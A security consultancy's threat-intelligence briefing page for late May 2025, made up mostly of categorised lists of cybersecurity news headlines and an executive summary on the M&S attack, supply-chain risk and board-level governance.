Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET

How well do you know your remote IT worker? - Help Net Security

Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware | TechRadar

Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers

Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign

WSJ: US probes fake White House staff plot | Cybernews

Late night cyber attack targets Israelis with fake hostage calls

Fraud, Scams and Financial Crime

Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard

Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET

Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security

Grandpa-conning crook jailed over sugar-coated drug scam • The Register

Public urged to create secret passwords with family and friends to avoid AI-generated scams

Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats

Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers

How CISOs can regain ground in the AI fraud war - Help Net Security

US sanctions firm linked to cyber scams behind $200 million in losses

Artificial Intelligence

How to spot phishing emails now that AI has cleaned up the typos

Cyber criminals exploit AI hype to spread ransomware, malware

The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard

Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert

Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security

Cyber criminals Take Advantage of ChatGPT and Other Generative AI Models | Security Magazine

TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar

How well do you know your remote IT worker? - Help Net Security

Public urged to create secret passwords with family and friends to avoid AI-generated scams

How CISOs can regain ground in the AI fraud war - Help Net Security

Rethinking Data Privacy in the Age of Generative AI

AI forces security leaders to rethink hybrid cloud strategies - Help Net Security

The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech

Most AI chatbots devour your user data - these are the worst offenders | ZDNET

Malware

Cyber criminals exploit AI hype to spread ransomware, malware

New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware

SilverRAT Source Code Leaked Online: Here’s What You Need to Know

TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar

Fake Zenmap. WinMRT sites target IT staff with Bumblebee malware

Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware

Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto

Hackers increasingly target UEFI and bootloaders | Cybernews

Don't click on that Facebook ad for a text-to-AI-video tool • The Register

GitHub becomes go-to platform for malware delivery across Europe - Help Net Security

Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware | TechRadar

New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.

Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations

Latrodectus malware detected on over 44K IPs | Cybernews

PumaBot Targets Linux Devices in Botnet Campaign

From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign

$24 Mln In Cryptocurrency Seized From Russian Malware Network

New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency

Bots/Botnets

New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.

PumaBot Targets Linux Devices in Botnet Campaign

Mobile

Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats

If You Get This Message On Your Phone It’s An Attack

Internet of Things – IoT

PumaBot Targets Linux Devices in Botnet Campaign

States Have a TP-Link Problem - The National Interest

Data Breaches/Leaks

ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach

NHS trusts in London and Southampton hit by cyber attack

How Hunters International Used the Browser to Breach Enterprises — And Why They Didn’t See It… - Security Boulevard

Coinbase and TaskUs hack: How it happened | Fortune Crypto

Hackers claim major French govt email data breach | Cybernews

Data broker giant LexisNexis says breach exposed personal information of over 364,000 people | TechCrunch

Adidas Falls Victim to Third-Party Data Breach

Luxury jet company allegedly faces data breach | Cybernews

Organised Crime & Criminal Actors

Cyber crime much bigger than nation-state ops: Daniel • The Register

Any teenager can be a cyber attacker now, parents warned

Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek

The Uber of the underworld

$24 Mln In Cryptocurrency Seized From Russian Malware Network

US sanctions firm linked to cyber scams behind $200 million in losses

Russian hospital programmer gets 14 years for leaking soldier data to Ukraine | The Record from Recorded Future News

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Coinbase and TaskUs hack: How it happened | Fortune Crypto

Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto

Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard

Hacker steals $223 million in Cetus Protocol cryptocurrency heist

BlackRock Issues Bitcoin Warning, Says BTC Source Code Could Be Rendered ‘Flawed or Ineffective’ by Quantum Computing - The Daily Hodl

Dark Partners cyber crime gang fuels large-scale crypto heists

$24 Mln In Cryptocurrency Seized From Russian Malware Network

Insider Risk and Insider Threats

In cyber attacks, humans can be the weakest link

Why layoffs increase cyber security risks - Help Net Security

US intelligence agency employee charged with espionage | AP News

Insurance

Cyber attack Surge Benefits Insurers, Prompts Rethink on Premiums

Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance

What UK retail breaches mean for the global cyber insurance market | Insurance Business America

Supply Chain and Third Parties

DragonForce used MSP's RMM software to distribute ransomware • The Register

ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach

UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net

M&S hack may have been caused by security issues at Indian IT giant Tata Consultancy Services | TechRadar

Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge

4.5% of breaches now extend to fourth parties - Help Net Security

'Everest Group' Extorts Global Orgs via SAP's HR Tool

Cloud/SaaS

A key Microsoft OneDrive feature has a worrying security flaw which could expose user data | TechRadar

SaaS companies in firing line following Commvault attack • The Register

What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard

AI forces security leaders to rethink hybrid cloud strategies - Help Net Security

Outages

SentinelOne back online after lengthy outage • The Register

Encryption

BlackRock Issues Bitcoin Warning, Says BTC Source Code Could Be Rendered ‘Flawed or Ineffective’ by Quantum Computing - The Daily Hodl

Experts "deeply concerned" by the EU plan to weaken encryption | TechRadar

Quantum Computing Threat to Cryptography

Linux and Open Source

PumaBot Targets Linux Devices in Botnet Campaign

Passwords, Credential Stuffing & Brute Force Attacks

Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek

Social Media

TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar

Don't click on that Facebook ad for a text-to-AI-video tool • The Register

Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware | TechRadar

Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET

Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas

What to do if your Facebook account has been phished, hacked, stolen

Regulations, Fines and Legislation

Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com

Major conference in San Antonio shelved due to US policy climate

Banks Want SEC to Rescind Cyber Attack Disclosure Requirements

US Government Launches Audit of NIST’s National Vulnerability Database - Infosecurity Magazine

Models, Frameworks and Standards

How FedRAMP Reciprocity Works with Other Frameworks - Security Boulevard

Careers, Working in Cyber and Information Security

Armed forces charity steps in to address cyber mental health crisis | Computer Weekly

Christian Timbers: Cyber Security Executive Pay Up 4.3% in 2025

Cyber Security salaries in 2025: Shifting priorities, rising demand for specialized roles | SC Media

Law Enforcement Action and Take Downs

Latrodectus malware detected on over 44K IPs | Cybernews

UK, US Police Target Ransomware Gangs In Latest Action | Silicon

Grandpa-conning crook jailed over sugar-coated drug scam • The Register

Robbinhood ransomware: Iranian man pleads guilty to cyber crime that cost US government millions | The National

Russian hospital programmer gets 14 years for leaking soldier data to Ukraine | The Record from Recorded Future News

Misinformation, Disinformation and Propaganda

Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

UK Government invests £1bn to equip the army for cyber war, defence secretary reveals

US intelligence agency employee charged with espionage | AP News

Britain’s new defence pact with the EU

Nation State Actors

Cyber crime much bigger than nation-state ops: Daniel • The Register

Midyear Roundup: Nation-State Cyber Threats in 2025

ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach

US intelligence agency employee charged with espionage | AP News

China

China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure

China hacks show they're 'preparing for war': McMaster • The Register

States Have a TP-Link Problem - The National Interest

Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations

Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek

UK cyber security experts warn China's 'super embassy' could be used by spies to wiretap sensitive Square Mile communications | The Standard

Prague blames Beijing for cyber attack on foreign ministry

Chinese Hacking Group 'Earth Lamia' Targets Multiple Industries - SecurityWeek

Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com

China, Taiwan trade accusations over cyber attacks | Reuters

Russia

Hackers linked to Russia target UK Ministry of Defence staff with fake news emails - Euromaidan Press

Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek

New Russian state-sponsored APT quickly gains global reach, hitting expansive targets | CyberScoop

New Russian APT group Void Blizzard targets NATO-based orgs after infiltrating Dutch police | CSO Online

New Russian State Hacking Group Hits Europe and North America - Infosecurity Magazine

NCSC pins ‘malicious campaign’ of cyber attacks on Russian military intelligence – PublicTechnology

$24 Mln In Cryptocurrency Seized From Russian Malware Network

Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire

Ukraine tallies up Russian cyber attacks on local media since start of war | The Record from Recorded Future News

'Kisses from Prague': The fall of a Russian ransomware giant

Russian hospital programmer gets 14 years for leaking soldier data to Ukraine | The Record from Recorded Future News

Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents

Russia sentences programmer to 14 years for treason • The Register

Iran

85 Iranian cyber attacks linked to killing plots foiled in 2025, Israel says | Iran International

Robbinhood ransomware: Iranian man pleads guilty to cyber crime that cost US government millions | The National

North Korea

How well do you know your remote IT worker? - Help Net Security

Tools and Controls

DragonForce used MSP's RMM software to distribute ransomware • The Register

ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach

Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums

Why layoffs increase cyber security risks - Help Net Security

The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard

Welcome to the age of cyber insecurity in business

US, allies push for immediate SIEM, SOAR implementation | SC Media

Why Cyber Security Is Shifting From Detection To Performance

Organisations Must Train, Not Just Plan, for Crisis Events, Advises IT Research and Advisory Firm Info-Tech Research Group

What is OSINT and why it is so important to fight cyber criminals? | TechRadar

SaaS companies in firing line following Commvault attack • The Register

'Everest Group' Extorts Global Orgs via SAP's HR Tool

Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert

The edge devices security risk: What leaders can do | IT Pro

Less than eight percent of top domains implement the toughest DMARC protection

AI Beats 90% of Human Teams in a Hacking Competition

Why data provenance must anchor every CISO’s AI governance strategy - Help Net Security

Recent Acquisitions Illustrate Consolidation Trends in Cyber Security | MSSP Alert

CISA's New SIEM Guidance Tackles Visibility and Blind Spots

‘Secure email’: A losing battle CISOs must give up | CSO Online

Incident Response Planning - Preparing for Data Breaches

Explaining What’s Happened in a Cyber Attack Is Challenging

Predictive Cyber Risk Analysis Using Aggregated Threat Intelligence

Building resilient cyber threat intelligence communities | Computer Weekly

SentinelOne back online after lengthy outage • The Register

What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard

AI forces security leaders to rethink hybrid cloud strategies - Help Net Security

Hackers claim major French govt email data breach | Cybernews

This National Guard unit went analog to simulate a cyber attack

Cyber security challenges could pave the way to a unified approach

Other News

Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire

Britain’s new defence pact with the EU

Why pilots fear that airplanes will be the next target of cyber hackers

The US Is Building a One-Stop Shop for Buying Your Data | WIRED

94 billion browser cookies sold on Telegram | Cybernews

The Cyber Security Catch That Comes With Free Public Wi-Fi

Banks report growing number of cyber attacks against clients | Radio Prague International

This National Guard unit went analog to simulate a cyber attack

Japan to draw up new cyber security strategy by year-end - Japan Today

Cyber security in mining: protecting infrastructure and digital assets | A&O Shearman - JDSupra

Airplane crash-detection systems could be vulnerable | The Week

Vulnerability Management

China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure

Not Every CVE Deserves a Fire Drill: Focus on What’s Exploitable

CVE Uncertainty Underlines Importance of Cyber Resilience

Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge

Hackers increasingly target UEFI and bootloaders | Cybernews

NIST Launches Metric to Measure Likelihood of Vulnerability Exploits - Infosecurity Magazine

New Attack Bypasses HTTP/2 Security for Arbitrary Cross-Site Scripting

Microsoft wants Windows Update to handle all apps | The Verge

Vulnerabilities

China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure

ConnectWise Confirms Hack, “Very Small Number” of Customers Affected - Infosecurity Magazine

Cyber Heads Up: “BadSuccessor”—A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025 - Security Boulevard

Questions mount as Ivanti tackles another round of zero-days | CyberScoop

SaaS companies in firing line following Commvault attack • The Register

Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek

A key Microsoft OneDrive feature has a worrying security flaw which could expose user data | TechRadar

UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net

Thousands of Asus routers are being hit with stealthy, persistent backdoors - Ars Technica

Cisco security flaw exploited to build botnet of thousands of devices | TechRadar

Chrome 137, Firefox 139 Patch High-Severity Vulnerabilities - SecurityWeek

Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin

Apple Safari exposes users to fullscreen browser-in-the-middle attacks

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 25/05/2025 Black Arrow Admin 25/05/2025

Black Arrow Cyber Threat Intelligence Briefing 23 May 2025

Black Arrow Cyber Threat Intelligence Briefing 25 May 2025:

-M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit

-Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets

-Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ

-Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP

-Cyber Security Now HSBC’s Largest Operational Cost

-Best Practices for Board-Level Cyber Security Oversight

-The Importance of Culture in an Effective Cyber Security Programme

-You Do a Fire Drill, so Do a Cyber Attack Drill

-Many Rush into GenAI Deployments, Frequently Without a Security Net

-SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why

-Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins

-Lumma Infostealer Infected About 10 Million Systems Before Global Disruption

-Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms

Executive Summary

The unfolding story of the recent incidents at the UK retailer Marks & Spencer (M&S) and others gives us insights into the risks faced by organisations in all sectors and locations. It is reported that M&S’ outsourced IT provider is conducting an internal investigation to establish if it was the main cause of the incident which has caused significant harm to the retailer. The Chief Executive of M&S is reported to be facing a loss of £1.1m in remuneration due to the attack, while the UK’s data protection authority is investigating the loss of personal information during the incident.

These factors of supply chain risks, regulatory investigations, and personal losses of senior leadership, remind us of the need for all organisations to properly understand and manage their risks. The newly reported attack on food distributor Peter Green Chilled further highlights the need for robust due diligence and embedding cyber security requirements in supplier relationships.

Our review of threat intelligence highlights that despite long-standing guidance, many organisations still fail to act on basic protections. Regulators and insurers alike are now focusing more heavily on board-level accountability and cultural readiness, rather than purely technical defences. From conducting cyber attack drills to strengthening oversight structures, effective governance must be proactive, not reactive. HSBC’s admission that cyber security is now its single largest operational cost underscores just how strategic this issue has become.

Finally, the rise of infostealer malware, generative AI risks, and nation-state espionage campaigns such as APT28 are expanding the threat landscape. Black Arrow urges executives to conduct an impartial cyber risk assessment of their organisation, including their supply chain, and to ensure that this analysis and the resulting cyber security strategy are governed as part of the business-wide risk management.

Governance, Risk and Compliance

Businesses ignore advice on preventing cyber attacks, says GCHQ

Jump in cyber attacks should put businesses on high alert | Computer Weekly

Are we dangling on the edge of a digital apocalypse given all of the high-profile attacks recently? | News and events | Loughborough University

You do a fire drill, so do a cyber attack drill

Executive complacency is the most dangerous cyber threat today, warns insurance VP | Insurance Business America

Best practices for board-level cyber security oversight | TechTarget

Cyber attack threat keeps me awake at night, bank boss says - BBC News

Cyber Security now HSBC's largest operational cost | Mortgage Introducer

The Hidden Cyber Security Risks of M&A

The Importance of Culture in an Effective Cyber Security Program | Ankura - JDSupra

Why Rigid Security Programs Keep Failing

Threats

Ransomware, Extortion and Destructive Attacks

Scattered Spider hackers in UK are ‘facilitating’ cyber attacks, says Google | Cybercrime | The Guardian

What we know about DragonForce ransomware • The Register

Scattered Spider snared financial orgs before retail • The Register

Service desks are under attack: What can you do about it?

Scattered Spider's Ties to Russia: Closer Than We Think?

3am Ransomware Adopts Email Bombing, Vishing Combo Attack

Ransomware gangs increasingly use Skitnet post-exploitation malware

LockBit Leaks Reveal Drive to Recruit Ransomware Newbies

Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang

Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access

Ex-NSA listened to Scattered Spider's calls: 'They're good' • The Register

Hackers are spreading fake password manager ransomware via Bing ads | PCWorld

VanHelsing ransomware builder leaked on hacking forum

Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyber Attacks, and Spying | WIRED

A Brief History of DanaBot, Longtime Ecrime Juggernaut Disrupted by Operation Endgame | Proofpoint US

Growing Number Of Targeted Businesses Paying Cyber Criminals, Survey Shows | Scoop News

New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads

Ransomware Victims

M&S IT contractor ‘investigating whether it was gateway for cyber attack’ | Marks & Spencer | The Guardian

How hackers went undetected for 52 hours to cripple M&S

M&S chief executive faces £1.1mn pay hit after cyber attack

Ransomware strikes UK food distributor in latest retail blow • The Register

Scattered Spider hackers in UK are ‘facilitating’ cyber attacks, says Google | Cybercrime | The Guardian

What we know about DragonForce ransomware • The Register

Service desks are under attack: What can you do about it?

Marks & Spencer faces $402 million profit hit after cyber attack

Why DragonForce is growing in prominence – with retailer attacks boosting its reputation | IT Pro

Investors and shoppers await clues on fallout from M&S cyber attack | Marks & Spencer | The Guardian

M&S cyber attack has cost £300m so far - and disruption will continue until July

Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer

UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC

M&S and Co-Op: BBC reporter on talking to the hackers - BBC News

'Cyber Siege' BBC documentary explores 'devastating' attack on council five years on - Teesside Live

Sensitive Personal Data Stolen in West Lothian Ransomware Attack - Infosecurity Magazine

Mobile carrier Cellcom confirms cyber attack behind extended outages

Kettering Health hit by system-wide outage after ransomware attack

Arla Foods confirms cyber attack disrupts production, causes delays

Phishing & Email Based Attacks

BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL

Polymorphic phishing attacks flood inboxes - Help Net Security

New Phishing Attack Mimic as Zoom Meeting Invites to Steal Login Details

Novel Phishing Attack Combines AES, Poisoned npm Packages

America is the top source of spam, and it’s getting worse thanks to growing data center infrastructure | TechRadar

Russian Threat Actor TAG-110 Goes Phishing in Tajikistan

Business Email Compromise (BEC)/Email Account Compromise (EAC)

BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL

Other Social Engineering

Service desks are under attack: What can you do about it?

3am Ransomware Adopts Email Bombing, Vishing Combo Attack

AI voice hijacking: How well can you trust your ears? - Help Net Security

How to Win Followers and Scamfluence People | WIRED

Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine

SIM scammer who helped hijack SEC X account put behind bars • The Register

Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News

Fraud, Scams and Financial Crime

BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL

‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian

How to Win Followers and Scamfluence People | WIRED

Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine

Artificial Intelligence

Many rush into GenAI deployments, frequently without a security net - Help Net Security

Uncensored AI Tool Raises Cyber Security Alarms - Infosecurity Magazine

Mapping the Future of AI Security - Security Boulevard

Data Security Risk: Analysis of AI Tools Reveals 84% Breached | Security Magazine

AI voice hijacking: How well can you trust your ears? - Help Net Security

How to Win Followers and Scamfluence People | WIRED

Security Threats of Open Source AI Exposed by DeepSeek

Be careful what you share with GenAI tools at work - Help Net Security

Finding the right balance between 'vibe coders' and security - IT Security Guru

GitLab's AI Assistant Opened Devs to Code Theft

Meta plans to train AI on EU user data from May 27 without consent

Irish DPC okays Meta's EU AI training plans • The Register

2FA/MFA

What is Universal 2nd Factor (U2F)? | Definition from TechTarget

Malware

Lumma infostealer infected about 10 million systems before global disruption | CyberScoop

Malware Evasion Techniques - What Defenders Need to Know

100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads

Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access

Novel Phishing Attack Combines AES, Poisoned npm Packages

Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs

Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain | Trend Micro (US)

Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld

Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register

What Is a Computer Virus, Really?

Bots/Botnets

Hackers unleash botnet capable of ‘killing most companies’ | The Independent

Mobile

Phone theft is on the rise - 7 ways to protect your device before it's too late | ZDNET

How to hack a phone: 7 common attack methods explained | CSO Online

O2 UK patches bug leaking mobile user location from call metadata

Say goodbye to passwords: Android’s bold security shift explained - Talk Android

Denial of Service/DoS/DDoS

Major Russian state services disrupted, reportedly due to cyber attack | The Record from Recorded Future News

Internet of Things – IoT

Growing Cyberthreats To The Internet Of Things

Why console makers can legally brick your game console - Ars Technica

Data Breaches/Leaks

Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED

M&S faces multimillion-pound lawsuit over cyber attack data leak - Retail Gazette

M&S’ Slow Recovery From Cyber Attack Puts it at Risk of Lasting Damage

Legal Aid Agency Warns Lawyers, Defendants on Data Breach

Solicitors criticise ‘antiquated’ Legal Aid Agency IT system after cyber attack | The Independent

M&S CEO faces multimillion-pound pay hit after cyber attack - Retail Gazette

Legal Aid cyber attack 'more extensive than originally understood'

M&S cyber attack has cost £300m so far - and disruption will continue until July

Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer

Large Retailers Land in Scattered Spider's Ransomware Web

UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC

Scattered Spider is focus of NCA inquiry into cyber attacks against UK retailers | Hacking | The Guardian

More Law Firms Join the Surge of Class Action Lawsuits Against Coinbase in Wake of Cyber Attack

Coinbase confirms insider breach affects 70,000 users • The Register

Cyber attack on Legal Aid Agency exposed ‘significant amount’ of applicant data - LBC

11 Of The Worst Data Breaches In The History Of The Internet

Your information was probably stolen again: Researcher discovers 184 million stolen logins | Digital Trends

Report: Over 50% of top oil and gas firms hit by data breaches in last 30 days | World Pipelines

Debt Collector Data Breach Affects 200,000 Harbin Clinic Patients - Infosecurity Magazine

Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom

Coca-Cola workers' info allegedly stolen by hackers | Cybernews

GitLab's AI Assistant Opened Devs to Code Theft

Organised Crime & Criminal Actors

BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL

LockBit Leaks Reveal Drive to Recruit Ransomware Newbies

‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian

The cyber criminals are now doing PR | PR Week UK

How to Win Followers and Scamfluence People | WIRED

European Union sanctions Stark Industries for enabling cyber attacks

Attacker Specialization Puts Threat Modeling on Defensive

SIM scammer who helped hijack SEC X account put behind bars • The Register

Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News

Hackers use fake Ledger apps to steal Mac users’ seed phrases

Coinbase confirms insider breach affects 70,000 users • The Register

Identity Security Has an Automation Problem—And It's Bigger Than You Think

Insider Risk and Insider Threats

Coinbase confirms insider breach affects 70,000 users • The Register

Identity Security Has an Automation Problem—And It's Bigger Than You Think

Insurance

Executive complacency is the most dangerous cyber threat today, warns insurance VP | Insurance Business America

UK Retail Cyber Attacks May Drive Up US Insurance Premiums

Supply Chain and Third Parties

UK supermarket distributor suffers ransomware attack - BBC News

Third-party vendors responsible for 41.8% of fintech data breaches, survey claims

NHS England Rolls Out Voluntary Cyber Charter for IT Suppliers

Cloud/SaaS

10 SaaS Security Risks Most Organisations Miss | Grip - Security Boulevard

Advisory Update on Cyber Threat Activity Targeting Commvault’s SaaS Cloud Application (Metallic) | CISA

Outages

Delta’s lawsuit against CrowdStrike given go-ahead • The Register

Mobile carrier Cellcom confirms cyber attack behind extended outages

Identity and Access Management

Exposed Credentials: Powering the Global Cyber Crime Wave

Modern authentication: Why OIDC and SAML are just the start - Security Boulevard

Identity Security Has an Automation Problem—And It's Bigger Than You Think

Encryption

Preparing for the post-quantum era: a CIO's guide to securing the future of encryption | CyberScoop

Governments continue losing efforts to gain backdoor access to secure communications

Signal Alternative Used by Trump Officials Cracked in 20 Minutes, Exposing "Military-Grade" Security Claims as Hollow

Passwords, Credential Stuffing & Brute Force Attacks

Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED

Warning — Stealing Windows Passwords Is As Easy As APT 123

Exposed Credentials: Powering the Global Cyber Crime Wav

Social Media

Meta plans to train AI on EU user data from May 27 without consent

Irish DPC okays Meta's EU AI training plans • The Register

Malvertising

Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine

Hackers are spreading fake password manager ransomware via Bing ads | PCWorld

Regulations, Fines and Legislation

Japan arms itself against foreign cyber attacks with new law

GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine

NSA cyber director Luber to retire at month’s end | The Record from Recorded Future News

Governments continue losing efforts to gain backdoor access to secure communications

Japan passed a law allowing preemptive offensive cyber actions

FTC finalizes order requiring GoDaddy to secure hosting services

CVE Disruption Threatens Foundations of Defensive Security

Members vexed by Cyber Command turmoil - Roll Call

Models, Frameworks and Standards

GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine

NCC Group Expert Warns UK Firms to Prepare for New Cyber Security Bill - Infosecurity Magazine

Collaboration is key in the Cyber Assessment Framework | UKAuthority

Inside MITRE ATT&CK v17: Smarter defences, sharper threat intel - Help Net Security

Cyber Security Now Central to Digital Health M&A Success

Data Protection

Meta plans to train AI on EU user data from May 27 without consent

Irish DPC okays Meta's EU AI training plans • The Register

Careers, Working in Cyber and Information Security

UK Cyber Vacancies Growing 12% Per Year - Infosecurity Magazine

Why so many military veterans move into cyber security - BBC News

Law Enforcement Action and Take Downs

Lumma infostealer infected about 10 million systems before global disruption | CyberScoop

Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyber Attacks, and Spying | WIRED

A Brief History of DanaBot, Longtime Ecrime Juggernaut Disrupted by Operation Endgame | Proofpoint US

Police takes down 300 servers in ransomware supply-chain crackdown

Police arrests 270 dark web vendors, buyers in global crackdown

Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register

SIM scammer who helped hijack SEC X account put behind bars • The Register

Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News

US Navy petty officer charged in horrific CSAM case • The Register

Teen to plead guilty to PowerSchool extortion attack • The Register

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek

China

Chinese hackers breach US local governments using Cityworks zero-day

Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies

Chinese ‘kill switches’ found in US solar farms

A house full of open windows: Why telecoms may never purge their networks of Salt Typhoon | CyberScoop

Russia

Russia-linked APT28 targets western logistics entities and technology firms

Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine

Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security

Scattered Spider's Ties to Russia: Closer Than We Think?

Unpacking Russia's cyber nesting doll - Atlantic Council

Europe sanctions Putin's pals over 'hybrid' threats • The Register

Russia to enforce location tracking app on all foreigners in Moscow

Major Russian state services disrupted, reportedly due to cyber attack | The Record from Recorded Future News

